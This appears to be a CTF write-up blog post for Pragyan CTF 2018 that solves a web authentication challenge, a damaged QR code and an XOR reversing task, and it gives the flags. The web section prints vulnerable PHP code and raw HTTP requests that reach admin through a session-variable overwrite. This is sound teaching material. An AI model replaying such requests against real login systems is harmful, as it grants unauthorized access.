Pragyan CTF 2018 - Write-ups

🔗Information

🔗Version

By Version Comment
noraj 1.0 Creation

🔗CTF

  • Name : Pragyan CTF 2018
  • Website : ctf.pragyan.org
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

Like last year, a lot of guessing in Pragyan CTF.

🔗150 - Authenticate your way to admin - Web

Owen had created an authentication system which lets users login with their email-id or their team name. But that’s not fun is it? Logging in as the admin beats it all, so there’s your challenge.

The portal is running at 128.199.224.175:23000

Note: Use your Pragyan CTF credentials to login to the web portal.

login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
> <?php
>
> session_start();
>
> require "helpers.php";
>
> $type = $_POST['id_type'];
> $identifier = $_POST['identifier'];
> $password = $_POST['password'];
> $_SESSION['id'] = $identifier;
>
> if($type === 'team_name') {
> $team_name = $identifier;
> $_SESSION['id_type'] = 'team_name';
>
> if(verify_teamname_password($team_name, $password) === true) {
> $_SESSION['logged_in'] = true;
> redirect('/homepage.php');
> }
> else {
> die("Invalid Team Name-Password combination !!");
> }
> }
> elseif ($type === 'email') {
> $email = $identifier;
> $_SESSION['id_type'] = 'email';
>
> if(verify_email_password($email, $password) === true) {
> $_SESSION['logged_in'] = true;
> redirect('/homepage.php');
> }
> else {
> die("Invalid Email-Password combination !!");
> }
> }
>
> ?>
>

homepage.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
> <?php
>
> session_start();
>
> require "helpers.php";
>
> if(! check_login())
> redirect($LOGIN_URL);
>
> $id_type = $_SESSION['id_type'];
> $id = $_SESSION['id'];
>
> ?>
>
> <!DOCTYPE html>
> <html>
> <head>
> <title>Homepage</title>
> </head>
> <body style='background-color: #d6eaf8'>
>
> <p style="float: right">
> <a href='/logout.php'> Logout </a>
> </p>
> <p style="clear: both"></p>
>
> <p style='height:30px; width:100%;'> </p>
>
> <center>
>
> <h2> Welcome User !! </h2>
> <br><br>
>
> <h3>
> <?php
> if($id_type === 'email') {
> echo "Email :- ".$id;
> }
> elseif ($id_type === 'team_name')
> {
> echo "Team Name :- ".$id ;
> }
> ?>
> </h3>
> <br><br>
>
> <h4>
> Here's a random funny saying for you :) <br>
> </h4>
> <br><br>
>
> <?php
> require "sayings.php";
> printf(get_random_saying());
> echo "<br><br>";
> if($id === 'admin' && $id_type === 'team_name')
> printf(output_flag());
> ?>
>
> </center>
>
> </body>
> </html>
>

We can see in login.php that we need to login as admin and with the team_name mode: if($id === 'admin' && $id_type === 'team_name'), but we don't have the password and we can't bypass it.

So let's login with our team credentials:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /login.php HTTP/1.1
Host: 128.199.224.175:23000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://128.199.224.175:23000/
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: PHPSESSID=nj8pe045eg0sr6r2ef4r5ch0r6
Connection: close
Upgrade-Insecure-Requests: 1

identifier=rawsec&id_type=team_name&password=mypass

So now examining login.php we can read the following code:

1
2
3
4
5
6
7
8
9
10
11
12
if($type === 'team_name') {
$team_name = $identifier;
$_SESSION['id_type'] = 'team_name';

if(verify_teamname_password($team_name, $password) === true) {
$_SESSION['logged_in'] = true;
redirect('/homepage.php');
}
else {
die("Invalid Team Name-Password combination !!");
}
}

Now we have a valid session created on server side thanks to $_SESSION['logged_in'] = true; and we are then redirected to homepage.php.

We can see our homepage like this:

Now let's use Burp Suite to replay the modified login request to match the required conditions to get the flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /login.php HTTP/1.1
Host: 128.199.224.175:23000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://128.199.224.175:23000/
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: PHPSESSID=nj8pe045eg0sr6r2ef4r5ch0r6
Connection: close
Upgrade-Insecure-Requests: 1

identifier=admin&id_type=team_name

We still have our nj8pe045eg0sr6r2ef4r5ch0r6 valid session but the last POST sent to the server has set $id === 'admin'.

Now we have just to refresh homepage.php and grab the flag: pctf{4u1h3ntic4Ti0n.4nd~4u1horiz4ti0n_diff3r}.

🔗100 - Quick Response - Forensics

Tony had created a QR code for a specific purpose, and sent to his friend Rhody for deployment but when deployed, the QR code wasn’t working as it was supposed to. Figure out what’s wrong and help fix the problem.

If we take a look at the QR code structure, we can see that the positioning squares are undersized and that the alignment square is not completly closed.

Now let's open the QR code in GIMP.

In the Display menu we will allow some features: Show Grid and Snap to Grid.

Now we need to configure the grid to be the same size as the QR code pixels.

So we can easily copy and paste some pixels to complete the squares and get a valid QR code:

Scanning the previous QR code we get this message:

The flag is: pctf{r3p4ir1nG~Qr_1s-my_h0bBy}

🔗50 - Assemble your way to the flag - Reverse

My friend was trying out assembly for the first time, he has no clue what he's doing, help him out and procure your reward in the form of a flag :)

I fired the awesome radare2, analysed the binary, displayed symbols, and show the assembly of the main function.

Then I saw there were two char xored each time, so I xored them.

All of that can be watched following the asciinema replay:

So we can note each un-XORed char and reverse it:

1
2
$ printf %s '}y1bm3sS4_n1_3d0c_sdNeg3l{ftcp' | rev
pctf{l3geNds_c0d3_1n_4Ss3mb1y}
Share